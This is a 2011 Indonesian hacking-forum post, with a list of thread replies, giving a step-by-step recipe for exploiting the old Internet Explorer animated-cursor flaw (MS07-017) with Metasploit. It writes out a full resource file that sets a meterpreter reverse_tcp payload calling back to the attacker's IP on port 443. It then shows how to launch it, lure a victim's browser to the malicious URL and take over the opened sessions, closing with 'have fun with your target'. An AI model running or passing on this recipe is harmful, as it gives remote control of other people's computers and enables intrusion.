exploit file ani (animated cursor)
#1
numpang ngepost y... Smile
bugs ini udh termasuk bugs yg udah tua, tpi lumayan lah buat yag bru belajar kya ane... Big Grin.

pertama buat file ie_ani (terserah namanya apa, n text editor boleh apa aja)

Code:
# nano ie_ani

trus paste kode di bawah pada file ie_ani.. Nb SRVHOST n LHOST itu ip ente

Code:
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.56.102
set SRVPORT 80
set LHOST 192.168.56.102
set LPORT 443
set URIPATH /ani
exploit

trus save..
jalanin msfconsole dengan menggunakan resource file ie_ani
Code:
# msfconsole -r ie_ani

ini hasil'y
[Image: ie_ani.png]

trus arahin target ke ip kita lewat ie browser:
ip ane di sini 192.168.56.102 n uripath'y /ani

Code:
192.168.56.102/ani

[Image: targetrunningie.png]


akhirnya meterpreter terbuka untuk di exploitasi Smile
daftar sessions yg aktif
Code:
sessions -l
berpindah ke sessions
Code:
sessions -i <nmr sessions>
[Image: meterpreter.png]

buat command meterpreter ud prnh di bahas ama om zee di forum, search aj... n have fun with your target... Big Grin
Hacking isn't just Computers & Exploits. It's a Philosophy.


Messages In This Thread
exploit file ani (animated cursor) - by nasa - 11-06-2011, 07:42 PM
RE: exploit file ani (animated cursor) - by THJC - 11-06-2011, 08:06 PM
RE: exploit file ani (animated cursor) - by nasa - 11-07-2011, 01:31 AM
RE: exploit file ani (animated cursor) - by k41t0 - 11-07-2011, 09:39 AM
RE: exploit file ani (animated cursor) - by nasa - 11-07-2011, 10:32 AM
RE: exploit file ani (animated cursor) - by syn - 11-07-2011, 07:44 PM
RE: exploit file ani (animated cursor) - by THJC - 11-07-2011, 08:48 PM
RE: exploit file ani (animated cursor) - by nasa - 11-08-2011, 10:34 AM




Users browsing this thread: 1 Guest(s)